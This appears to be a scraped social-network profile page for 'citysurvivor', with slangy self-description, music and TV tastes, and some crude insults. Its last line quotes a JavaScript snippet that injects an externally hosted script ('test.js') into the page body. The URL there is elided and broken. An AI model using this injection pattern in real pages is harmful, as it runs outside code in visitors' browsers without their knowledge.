citysurvivor profile picture


yOUr wOrst EnEmy cAn bE yOUr bEst fRiEnd......And yOUr bEst fRiEnd, yOUr wOrst EnEmy

About Me

iTs tHe #1 SurViVoR, fRoM tHe ReP yO CiTy CoMMitEE... iF U KnoW wHo i aM dEn U kNoW wUs uP. iF U dOnT aLrEAdy kNoW, tHeN wE leFt U oWt dA LooP 4aReaSoN....U a *SniTch*, a *BiTch*,oR jUs nOt pArTTa *dA cLiQue*THIS IS

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My Interests

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I'd like to meet: - Graffiti - Graffiti Creator YOU!?!
More posters at city city city friends ......
Your Porn Star Name Is...
Action Jackson What's Your Porn Star Name? ..!YO.....DIS SHIT IZ FUNNY...CHECK IT OUT


hIp-hOp, rEAggE/dAncEhAll Thats my M.O. however i'm a music conasiour. I endulge myself with every genre (NO COUNTRY, *see the name)

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THeReS 2 MaNY 2 NaMe....4ReaL.. HeReS a LiST oF MoVieS i "DoNT" LiKe: aNYTHiNG WiTH "MaRio VaN PeePLeS"(B-SiDeS NeWJaCKCiTY), NoNe oF THoSe "BiLLY BLaNKS" WuS HiS NaMe "THe DRaGoN" oR THaT "BLoNDe BiTCh" Tai Bo KaRaTe FLiX, BLueS BRoTHeRS 2000 (WuT a SHaMe, iF THaT GoVeRNMeNT GuY SHoT HiMSeLF oVeR a LiL' iNTeRNeT CHaTTiN....THeN MoRe THaN a FeW PeoPLe SHouLD HaVe DRoPeD 4 THaT oNe),STaRSHiP TRooPeRS 2 (WHY DiD THeY Do THaT 2 MY MoVie?)


i HaTe WeN a CoMeRCiaL CoMeS oN ...So i CHaNGe THe CHaNNeL...THeN FoRGeT WuT i WaS WaTCHiN,.."DAMN!!!"....So I STiCK To THe MoVie CHaNNeLS....i watch my boy FLAV....P.E. comin N2 white livin rooms EVERYWHERE, das wuz up,...HEROS,MILITARY CHNL,HISTORY CHNL, TWILIGHT ZONE, TALES FROM THE DARKSIDE, ENTORAGE,NIP TUCK, THE SHEILD, DIRT, RESCUE ME(FX got sum good shows),THE WIRE,i feel the same way about LOST as i did about OZ....i stop watchin when they killed "ADABESI" ......


Donald Goines, Nikki Giovani, U.S. Army survival guide.


frEEdOm fIghtErs, ReVoLuTioNaRieS,

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My KiDs R JaMaCaiN/iTaLiAn. .hOw GaNgStA iZ DaT? ...."var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /..